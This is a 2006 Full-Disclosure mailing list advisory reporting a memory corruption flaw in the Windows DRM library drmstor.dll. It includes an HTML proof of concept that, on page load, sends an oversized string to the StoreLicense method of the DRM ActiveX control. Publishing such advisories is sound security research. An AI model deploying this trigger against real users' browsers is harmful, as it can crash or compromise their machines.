[Full-disclosure] MS Windows DRM software Memory Corruption
- From: Joxean Koret <joxeankoret@xxxxxxxx>
- Date: Mon, 9 Oct 2006 13:04:44 +0200 (CEST)
Hi to all,
While finding buffer overflows in Internet Explorer I
found a memory corruption in the "drmstor.dll"
library which is a part of the DRM (Digital Rights
Management) software supplied with MS Windows.
The following Proof Of Concept is sufficient enough to
test the vulnerability:
<html>
<script>
function test()
{
var obj;
var x;
x = "AAAA";
for (i=0;i<=21;++i)
x += x;
obj = document.getElementById('testObj');
obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id='testObj'
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Contact
-------
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y móviles desde 1 céntimo por minuto.
http://es.voice.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] ARES 2007: Paper submission system is ready - Submission Deadline 19-11-2006
- Next by Date: Re: [Full-disclosure] SQL injection - moodle
- Previous by thread: [Full-disclosure] ARES 2007: Paper submission system is ready - Submission Deadline 19-11-2006
- Next by thread: [Full-disclosure] trojan horse to intercept voip calls
- Index(es):
Relevant Pages
|
